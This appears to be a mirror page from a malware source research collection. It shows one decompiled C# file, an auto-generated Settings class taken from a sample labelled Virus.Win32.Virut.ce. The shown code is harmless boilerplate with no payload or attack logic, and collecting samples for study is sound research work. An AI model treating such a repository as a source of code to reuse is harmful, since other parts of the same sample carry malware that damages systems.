mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
22 lines
896 B
C#
22 lines
896 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: cfFncEnabler.Properties.Settings
|
|||
|
// Assembly: cfFncEnabler, Version=1.0.0.18, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 332E9E14-3026-4FC8-B925-0BA2C251918E
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-bb6bf5a81e7ce35327253fa15ae76b9f32a2dfb7c0def1083789e9ea135c25ee.exe
|
|||
|
|
|||
|
using System.CodeDom.Compiler;
|
|||
|
using System.Configuration;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
|
|||
|
namespace cfFncEnabler.Properties
|
|||
|
{
|
|||
|
[CompilerGenerated]
|
|||
|
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
|
|||
|
internal sealed class Settings : ApplicationSettingsBase
|
|||
|
{
|
|||
|
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
|
|||
|
|
|||
|
public static Settings Default => Settings.defaultInstance;
|
|||
|
}
|
|||
|
}
|